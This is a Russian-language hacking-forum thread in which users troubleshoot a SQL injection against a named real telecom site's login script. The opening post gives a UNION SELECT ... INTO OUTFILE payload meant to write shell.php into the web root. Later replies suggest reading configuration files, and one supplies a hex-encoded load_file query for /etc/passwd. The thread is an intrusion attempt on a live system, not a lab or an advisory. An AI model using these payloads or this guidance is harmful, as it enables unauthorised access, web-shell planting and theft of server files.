ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
12.02.2016, 10:49
|
|
Новичок
Регистрация: 12.02.2016
Сообщений: 9
Провел на форуме:
3297
Репутация:
0
|
|
Сообщение от kostea
↑
http://my.moldtelecom.md/scripturi/ajax_login.php?username=\&password=UNION+SELECT+1, '',3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23,24,25,26,27,28,29+INTO+OUTFILE+'/var/www/html/platformaonline/template/new/scripturi/shell.php'+--+
Что я делаю нетак?
Раскрытие
http://my.moldtelecom.md/scripturi/a....php?username=
Нет прав на запись в папку, судя по всему.
|
|
|
12.02.2016, 13:15
|
|
Новичок
Регистрация: 23.12.2015
Сообщений: 29
Провел на форуме:
9857
Репутация:
0
|
|
Сообщение от Setrus
↑
Нет прав на запись в папку, судя по всему.
Когда нет прав пишет по другому
|
|
|
|
15.02.2016, 00:04
|
|
Участник форума
Регистрация: 29.05.2015
Сообщений: 110
Провел на форуме:
37430
Репутация:
0
|
|
Сообщение от kostea
↑
Когда нет прав пишет по другому
Экранирование
|
|
|
|
15.02.2016, 04:30
|
|
Новичок
Регистрация: 23.12.2015
Сообщений: 29
Провел на форуме:
9857
Репутация:
0
|
|
|
|
|
|
15.02.2016, 04:49
|
|
Участник форума
Регистрация: 25.04.2013
Сообщений: 153
Провел на форуме:
56255
Репутация:
2
|
|
Если я правильно понял то это просто ошибка и ни о какой sql inj тут речи не идет?
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
|
|
|
|
15.02.2016, 05:12
|
|
Новичок
Регистрация: 23.12.2015
Сообщений: 29
Провел на форуме:
9857
Репутация:
0
|
|
Сообщение от RWD
↑
Если я правильно понял то это просто ошибка и ни о какой sql inj тут речи не идет?
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
Вы или помогаете или не мусорьте
|
|
|
|
15.02.2016, 09:45
|
|
Участник форума
Регистрация: 29.05.2015
Сообщений: 110
Провел на форуме:
37430
Репутация:
0
|
|
приза не будет,т.к. экранирование на запись в файл не обойти.Только на чтение файла
Читай конфиги
|
|
|
|
15.02.2016, 16:00
|
|
Новичок
Регистрация: 23.12.2015
Сообщений: 29
Провел на форуме:
9857
Репутация:
0
|
|
Сообщение от ghost8
↑
приза не будет,т.к. экранирование на запись в файл не обойти.Только на чтение файла
Читай конфиги
Пример можно а то читать тоже неполучилось
|
|
|
|
15.02.2016, 19:33
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от kostea
↑
Пример можно а то читать тоже неполучилось
hex. прочитайте статью по MySQL injection
|
|
|
|
15.02.2016, 22:56
|
|
Участник форума
Регистрация: 29.05.2015
Сообщений: 110
Провел на форуме:
37430
Репутация:
0
|
|
Сообщение от kostea
↑
Пример можно а то читать тоже неполучилось
Код:
select load_file(0x2f6574632f706173737764); // читаем /etc/passwd
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
